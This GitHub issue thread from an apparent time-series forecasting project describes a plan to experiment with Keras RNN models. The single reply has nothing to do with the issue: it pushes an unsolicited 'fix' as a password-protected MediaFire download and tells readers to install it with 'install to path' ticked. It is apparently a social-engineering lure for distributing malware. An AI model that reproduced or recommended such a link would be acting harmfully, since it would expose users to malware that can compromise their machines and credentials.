### ISSUE TITLE
Keras Modeling

### ISSUE THREAD

**Issue by Volscente** [Volscente/TimeWarpForecast#13]
# Description
As a Data Scientist,

I want to research and experiment with Keras,

In order to model time series for forecasting future values.

# Changelog
- [ ] Add Data `alcohol_sales.csv` in `data/raw`
- [x] Add Notebook `keras_rnn_experimentation.ipynb` in `notebooks/deep_learning`

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
